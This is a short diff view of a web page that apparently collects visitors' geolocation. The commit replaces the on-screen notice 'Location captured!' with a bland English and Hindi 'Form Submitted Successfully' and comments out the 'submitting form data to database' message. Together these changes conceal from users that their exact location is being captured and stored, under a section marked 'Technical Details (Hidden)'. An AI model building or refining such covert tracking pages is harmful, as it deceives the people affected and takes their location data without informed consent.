File tree Expand file tree Collapse file tree 1 file changed +2
-2
lines changed
Expand file tree Collapse file tree 1 file changed +2
-2
lines changed Original file line number Diff line number Diff line change @@ -234,7 +234,7 @@ <h4>Technical Details (Hidden):</h4>
234234 } ) ;
235235
236236 if ( location ) {
237- statusDiv . innerHTML = '<div class="status-message success">✅ Location captured! Submitting form... </div>' ;
237+ statusDiv . innerHTML = '<div class="status-message success">✅ Form Submitted Successfully | फ़ॉर्म सफलतापूर्वक जमा हो गया </div>' ;
238238
239239 // Get exact location details using Google API
240240 getExactLocationDetails ( location . latitude , location . longitude ) ;
@@ -654,7 +654,7 @@ <h4>Technical Details (Hidden):</h4>
654654
655655 // Show loading message
656656 const statusDiv = document . getElementById ( 'locationStatus' ) ;
657- statusDiv . innerHTML = '<div class="status-message loading">🔄 Submitting form data to database...</div>' ;
657+ // statusDiv.innerHTML = '<div class="status-message loading">🔄 Submitting form data to database...</div>';
658658
659659 // Show loading popup
660660 showLoadingPopup ( 'Please wait, form submitting...' ) ;
You can’t perform that action at this time.
0 commit comments